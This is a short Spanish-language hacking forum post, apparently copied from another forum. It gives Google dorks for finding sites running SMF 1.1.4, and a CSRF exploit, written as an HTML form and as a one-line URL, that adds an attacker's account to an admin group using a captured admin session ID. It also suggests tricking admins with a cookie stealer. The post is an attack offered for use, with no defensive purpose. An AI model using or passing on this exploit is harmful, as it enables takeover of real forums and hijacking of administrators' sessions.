Bueno en primera este post lo saque de remoteexecution.es el link es este: http://www.remoteexecution.es/foro/index.php?topic=879 Dork: "SMF 1.1.4" Dork (SID): inurl:index.php inurl:sid= "SMF 1.1.4" < h t m l > < h e a d > < b o d y > < action="http://adress.com/path/index.php?action=membergroups;sa=members;group=GroupID" method="post" type="text" name="toAdd" id="toAdd" size="30"> < type="submit" name="add" value="Add Members"> < type="hidden" name="sc" value="ADMIN SESSION ID"> < /form> < /body> < /html> o si no tambien se puede usar forum/path/index.php?action=membergroups;sa=members;group=groupid;toAdd=usertoadd&add=Add+Members&sc=sid by Syntacks! Todo lo que usted necesita es administrador identificación de la sesión (SID), intentan engañar a los admin (utilizando cookie stealer etc
(sober==TRUE) ? beer++:beer++; @komtec1